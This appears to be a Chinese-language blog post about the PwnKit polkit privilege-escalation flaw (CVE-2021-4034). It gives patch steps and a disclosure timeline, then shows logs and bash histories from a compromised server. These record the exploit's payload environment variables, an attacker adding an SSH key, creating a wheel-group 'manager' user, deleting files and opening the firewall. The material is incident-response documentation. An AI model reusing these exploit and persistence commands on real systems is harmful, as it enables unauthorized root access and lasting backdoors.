舊聞 ↓
Linux 12年漏洞可讓駭客以根權限執行程式碼,影響所有發行版
這個編號CVE-2021-4034的漏洞,存在於Linux的Polkit(前稱PolicyKit),因而漏洞又被稱為PwnKit。Polkit是管理Unix、Linux等OS全系統准許權限的元件,讓一般權限的行程(process)可和高權限行程互動。而Polkit中一項setuid程式pkexec,則可讓用戶以root權限執行指令。
你可以 POC /CVE-2021-4034測漏洞,會直接 su 到 root
暫時的解決辦法
chmod 0755 /usr/bin/pkexec
永久解決辦法 (或重灌新版 Linux)
yum update polkit -y
PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)
被報告上去的時間線
- 2021-11-18: Advisory sent to secalert@redhat.
- 2022-01-11: Advisory and patch sent to distros@openwall.
- 2022-01-25: Coordinated Release Date (5:00 PM UTC).
如果你主機被入侵,可能會 ↓
建立一個 manager 使用者
more /var/log/secure
xxxxxxxxx sudoedit: pam_unix(sudo:auth): conversation failed xxxxxxxxx sudoedit: pam_unix(sudo:auth): auth could not identify password for [xxxxxxxxx] xxxxxxxxx sudo: xxxxxxxxx : user NOT in sudoers ; TTY=pts/0 ; PWD=/var/www/xxxxxxxxx ; USER=root ; COMMAND=sudoedit Y xxxxxxxxx pkexec[5651]: xxxxxxxxx: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/0] [CWD=/var/www/xxxxxxxxx/tmp/CVE-2021-4034] [COMMAND=GCONV_PATH=./pwnkit.so:. PATH=GCONV_PATH=. SHELL=/lol/i/do/not/exists CHARSET=PWNKIT GIO_USE_VFS=] xxxxxxxxx su: pam_unix(su:session): session opened for user root by xxxxxxxxx(uid=0) xxxxxxxxx sudo: root : TTY=pts/0 ; PWD=/var/www/xxxxxxxxx/tmp/CVE-2021-4034 ; USER=root ; COMMAND=/bin/bash xxxxxxxxx useradd[5759]: new group: name=manager, GID=10611 xxxxxxxxx useradd[5759]: new user: name=manager, UID=10611, GID=10611, home=/home/manager, shell=/bin/bash xxxxxxxxx usermod[5764]: add 'manager' to group 'wheel' xxxxxxxxx usermod[5764]: add 'manager' to shadow group 'wheel' xxxxxxxxx passwd: pam_unix(passwd:chauthtok): password changed for manager
這個使用者作了提權的動作
more /home/manager/.bash_history
sudo -s cd /var/www/xxxxxxxxx ls sudo -s cd ~ pwd mkdir tmp cd tmp/ tar -xf pkexec.tar cd CVE-2021-4034/ ./cve-2021-4034 exit
並在提權後作一些怪動作
more /root/.bash_history stty -echo nl lnext ^V ; export PS1= export PS1=;echo; echo OHwnW9JnBC; echo $$ 0</dev/null; R=$?; echo Fv6xkfIdcP; echo $R; echo qM3u2r6gC3 export PS1=;echo; echo OoMNTdcsZ8; stat -c '%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o' /proc/5681/exe 0</dev/null; R=$?; echo vt5FYTYuYt; echo $R; echo kmdHj4Qz5N export PS1=;echo; echo PyKh84RjvN; readlink /proc/5681/exe 0</dev/null; R=$?; echo wUCNvL88Kc; echo $R; echo dlcIwyDDC1 export PS1=;echo; echo X52D2cVkpC; (id -ru;id -u;id -rg;id -g;id -G;) 0</dev/null; R=$?; echo l99t9ta2Fl; echo $R; echo GZe4WH0efg stty sane ; stty rows 30 columns 120 ; export TERM='xterm-256color' ; export PS1='$(command printf "\[\033[01;31m\](remote)\[\033[0m\] \[\033[01;33m\]$(whoami)@$(hostname)\[\033[0m\]:\[\033[1;36m\]$PWD\[\033[0m\]\$ ")' cd ../ rm -rf * cd ~/.ssh/ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDFFQ7H4DxAEq4qAXGPUYAECPpbpvX0gX8YugJ/wu23igin3RXsFtMPnDqv0i0LAGHTinXut4NsR/1b8v/l0Lt0/E9RQEY4Op0Uilc8J8QB4EoKDZsk1qB8jBAXWACxkYehP2/cTFa61ELbV8NC1ybQZDe3qiQYS3fYePF901/ypPHGFhYkzCUSl3D2OK5wRmuEWdPO7gu0KFYnOR9coYHPeKCxf3ATUunYTTsWdHKt7A8cqYP3oTyv81wiRkogt5LQfYPtS1OWMqB2BvPZgX2pTaO50egpE6jsdd6o6MjZnTExJcN6gUm2fwkJGNASXJ82siJOFvrvRTQsizn5v3wpmM9urokj4LnxHUt8rahMkv/QuK1m6blLryOynh7sP6ug+cfA4lTZsc1mZPTDRlGGW/W6Q8e5XDyCYBXdHPkIXKo+Tj+00YKvKqMumu0Ibj4mfx/681qOcKGVKJxfmzDl3ej1pgU8YPTSVsF6bgdkWh1Ge3DCIXhlaX1oUz9mM9M= >> authorized_keys adduser manager ;usermod -aG wheel manager ;passwd manager cat /etc/ssh/sshd_config stty -echo nl lnext ^V ; export PS1= export PS1=;echo; echo wCROl9Fj0r; echo $$ 0</dev/null; R=$?; echo GflPaErpcn; echo $R; echo XGwHrNG2mo export PS1=;echo; echo mvxy44Lvj1; stat -c '%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o' /proc/5681/exe 0</dev/null; R=$?; echo tlOJnr47Pr; echo $R; echo oGEC4gPEzH export PS1=;echo; echo Wqo4ZSKWue; readlink /proc/5681/exe 0</dev/null; R=$?; echo LVkPohakrr; echo $R; echo ftVS0U0Oi5 export PS1=;echo; echo AzsRDhdRfL; (id -ru;id -u;id -rg;id -g;id -G;) 0</dev/null; R=$?; echo ZsjDioQbF5; echo $R; echo JhUCDzYgG8 stty sane ; stty rows 30 columns 120 ; export TERM='xterm-256color' ; export PS1='$(command printf "\[\033[01;31m\](remote)\[\033[0m\] \[\033[01;33m\]$(whoami)@$(hostname)\[\033[0m\]:\[\033[1;36m\]$PWD\[\033[0m\]\$ ")' cd /var/www/xxxxxxxxx ls systemctl status sshd service sshd ststus service sshd status service sshd restart sudo iptables -I INPUT 1 -p tcp -j ACCEPT stty -echo nl lnext ^V ; export PS1= export PS1=;echo; echo jRKw9yFasa; echo $$ 0</dev/null; R=$?; echo NZPIrVE43Y; echo $R; echo l1trwmUiai export PS1=;echo; echo mG25rB5Ivl; stat -c '%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o' /proc/5681/exe 0</dev/null; R=$?; echo NZUG6G5fw6; echo $R; echo slyZcBlViH export PS1=;echo; echo UZ42oIvtdi; readlink /proc/5681/exe 0</dev/null; R=$?; echo vy7bhZQ4Ww; echo $R; echo ZWXBcMbYaV export PS1=;echo; echo tXCXQW5UNe; (id -ru;id -u;id -rg;id -g;id -G;) 0</dev/null; R=$?; echo KnwQ5VvsLS; echo $R; echo jZzKcJeE1T exit sudo -s su root exit
留言